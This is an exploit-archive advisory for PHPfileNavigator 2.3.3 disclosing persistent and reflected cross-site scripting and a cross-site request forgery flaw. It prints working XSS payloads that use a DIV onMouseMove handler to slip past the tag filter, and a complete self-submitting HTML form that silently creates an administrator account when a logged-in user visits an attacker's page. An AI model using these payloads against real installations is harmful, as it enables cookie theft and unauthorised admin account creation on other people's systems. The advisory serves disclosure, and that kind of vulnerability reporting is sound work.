PHPfileNavigator 2.3.3 XSS / CSRF Vulnerabilities

2015-08-13T00:00:00
ID 1337DAY-ID-24033
Type zdt
Reporter hyp3rlinx
Modified 2015-08-13T00:00:00

Description

PHPfileNavigator version 2.3.3 suffers from persistent and reflective cross site scripting and cross site request forgery vulnerabilities.

                                        
                                            [+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt



Vendor:
================================
pfn.sourceforge.net



Product:
===================================
PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application
to complete manage your files and folders.



Vulnerability Type:
=========================
Persistent & Reflected XSS



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form.
nome, usuario, email etc...

We can leverage existing CSRF vulnerability to update a victimz profile and
store malicious
XSS payload or an malicious user can inject there own payloads when
updating thier profilez
affecting other users and the security of the whole application.

Multiple reflected XSS exists as well for following PHP pages all with same
vulnerable
parameter 'dir' when issuing GET requests.

pfn-2.3.3 application seems to filter out <script> tags etc, but we can
bypass this using
<DIV onMouseMove= JS functions!.

navega.php

accion.php

preferencias.php


Tested using xampp-1.7.0


Exploit code(s):
===============

Persistent XSS:
---------------

POST URL:
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=

e.g.

Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email'
field
and click Accept button.

Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL
database
in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate
will happen for
other injected fields 'email & 'usuario'.


Reflected XSS:
--------------

1)
http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir=
" <DIV  onMouseMove= "alert(document.cookie) " </a>

2)
http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir=
" <DIV  onMouseMove= "alert(document.cookie) " </a>

3)
http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir=
" <DIV  onMouseMove= "alert(document.cookie) " </a>



Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure



Severity Level:
=========================================================
Medium



Description:
==========================================================


Request Method(s):              [+] POST / GET


Vulnerable Product:             [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s):        [+] nome, usuario, email, dir


Affected Area(s):               [+] Admin

Vulnerability Details:
=====================
No CSRF token exists when creating user accounts, this allows
us to exploit the application and add arbitrary users The
?PHPSESSID= cookie used in URL is useless as we can just replace
the value with whatever.

e.g.

?PHPSESSID='inthesignofevil'

or just omit it all together makes no difference exploit will
still succeed. Next create our form POST and a self calling
Javascript function, then get a logged in user to click our
malicious linx or visit our webpage where they will be PWN3D.

Tested using xampp-1.7.0


Exploit code(s):
===============

<!DOCTYPE>
<html>

<!-- CSRF exploit add arbitrary user accounts with Admin privs -->
   <form id="USERIOS_EVILOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php?PHPSESSID=inthesignofevil"
method="post">
   <input type="hidden" name="id_usuario" value="" />
   <input type="text" id="nome" name="nome" value="hyp3rlinx" class="text"
tabindex="10" />
   <input type="text" id="usuario" name="usuario" value="hyp3rlinx"
class="text" tabindex="20" />
   <input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
   <input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
   <input type="text" id="email" name="email" value="[email protected]"
class="text" tabindex="50" />
   <input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
   <input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
   <select id="cambiar_datos" name="cambiar_datos" tabindex="75">
   <option value="1" >ON</option>
   <option value="0" selected="selected">OFF</option>
   </select>
   <select id="id_grupo" name="id_grupo" tabindex="80">
   <option value="0" selected="selected">Administrators</option>
   </select>
   <select id="admin" name="admin" tabindex="90">
   <option value="1" selected="selected">ON</option>
   <option value="0" >OFF</option>
   </select>
   <select id="estado" name="estado" tabindex="100">
   <option value="1" selected="selected">ON</option>
   <option value="0" >OFF</option>
   </select>
   <input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
 class="checkbox" />
  </form>

<script>

(function PWN3D(){
var e=document.getElementById('USERIOS_EVILOS')
e.submit()
})()

</script>

</body>
</html>

#  0day.today [2018-03-20]  #